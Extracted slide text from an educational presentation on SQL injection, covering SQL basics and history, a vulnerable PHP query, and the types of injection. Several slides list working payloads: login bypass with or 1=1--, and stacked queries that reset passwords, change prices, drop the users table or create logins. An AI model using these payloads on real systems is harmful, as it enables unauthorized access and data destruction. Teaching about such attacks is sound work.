2. 1
Explaining what SQL injection really is in depth.
Moreover, why we need to know about SQL Injection
2
What is SQL Injection?
Variety of SQL
Injection Method
Table of
Contents
Explaining different types of SQL Injection method and
how it works.
3. 3
4
5
We are going to go through SQL Injection war game to
explain how SQL injection really works in live
SQL Injection
Tutorial
Ways to prevent
SQL Injection
We will go through how we can prevent SQL Injection
happening to our website
We will just quickly review what we have learned today
Review
5. What is
SQL?
• Structured Query Language (Standard Language)
• Proprietary extension standard language
• Function
• Select
• Insert
• update,
• Find
• Etc.…
• Variety of Dialects
• T-SQL
• PL/SQL
• JET SQL
• Many more
7. Reason Why
SQL
1 Allows users to access data
in relational database
management systems
2 Allows to embed within other
language using SQL
modules, libraries & pre-
compiers
3 Allows users to set
permissions on tables,
procedures, And views
4 Tons of more reason to use
SQL!!
9. History of
SQL
1970 1974 1978 1986
Dr. Edgar F. “Ted” Codd of
IBM is known as the father of
relational databases. He
described a relational model
for databases
Structured Query Language
appeared
IBM worked to develop
Codd’s ideas and released a
product named System/R
IBM developed the first
prototype of relational
database and standardized
by ANSI. The first relational
database was released by
Relational Software and its
later becoming Oracle
28. Update
Statements
• To modify one or more existing rows of data within a table
• Changing Value which it already exist(s)
• Similar to INSERT Statements but it usually contains WHERE statement
53. What is
SQL Injection?
• Injecting arbitrary pieces of malicious code
• Executed as a piece of code by the back end SQL server
• Giving undesired results
• Executing code through vulnerable input parameters
• Compromising the whole system
54. History of
SQL Injection
1999 2003 2013 cont
Common Vulnerabilities and
Exposures dictionary has
existed to keep track of and
alert consumers and
developers alike of known
software vulnerabilities
Structured Query Language
appeared on top 10 list of
Common Vulnerabilities and
Exposures dictionary
SQL Injection was top 1
vulnerability chosen by
OWASP
SQL Injection continues to be
on top of the list for
vulnerability on many
organizations
57. Richard Alan Clarke
If you spend more on coffee than on IT security, you will be hacked. What’s more, you deserve
to be hacked
“ “
58. HOW SQL
INJECTION WORKS
Attacker Sends data containing SQL Fragments
CUSTOM CODE
Database
1
3 Attackers views unauthorized data
Example: $sql= “SELECT*FORM table WHERE id=‘”.$_REQUEST[‘id’].”’”;
Applications sends modified
queries to get the database and
query return values
2
59. Types of SQL Injection
Union Based
InclusiveError Based
Boolean
Executing
Time
Schema Discovery
Tautology
Single quote
76. Circumventing Access Controls
UserName = johnsmith’ or 1=1--
Password = p@ssword
SELECT COUNT (*) FROM Users WHERE
UserName=‘johnsmith’ or 1=1--’ AND Password=‘p@ssword’
77. Circumventing Access Controls
UserName = johnsmith’ and 1=1--
Password = p@ssword
SELECT COUNT (*) FROM Users WHERE
UserName=‘johnsmith’ and 1=1--’ AND
Password=‘p@ssword’
78. Circumventing Access Controls
UserName = johnsmith’--
Password = p@ssword
SELECT COUNT (*) FROM Users WHERE
UserName=‘johnsmith’--’ AND Password=‘p@ssword’
79. Modifying Data and DB Objects
UserName= johnsmith’;update users set password=‘foo’--
80. Modifying Data and DB Objects
UserName= johnsmith’;update users set password=‘foo’--
UserName= johnsmith’;update item set price=price-1--
81. Modifying Data and DB Objects
UserName= johnsmith’;update users set password=‘foo’--
UserName= johnsmith’;update item set price=price-1--
UserName= johnsmith’;insert into….
82. Modifying Data and DB Objects
UserName= johnsmith’;update users set password=‘foo’--
UserName= johnsmith’;update item set price=price-1--
UserName= johnsmith’;insert into….
UserName= johnsmith’;drop table users--
83. Modifying Data and DB Objects
UserName= johnsmith’;update users set password=‘foo’--
UserName= johnsmith’;update item set price=price-1--
UserName= johnsmith’;insert into….
UserName= johnsmith’;drop table users--
UserName= johnsmith’;create login…
133. Basic Attack Success Criteria
The app needs to return internal exceptions which bubble up
from the underlying database
134. Basic Attack Success Criteria
The app needs to return internal exceptions which bubble up
from the underlying database
The query structure needs to allow the union operator to be
injected and the vector needs to return results to the app
135. Basic Attack Success Criteria
The command executed on the database can be manipulated
by the attacker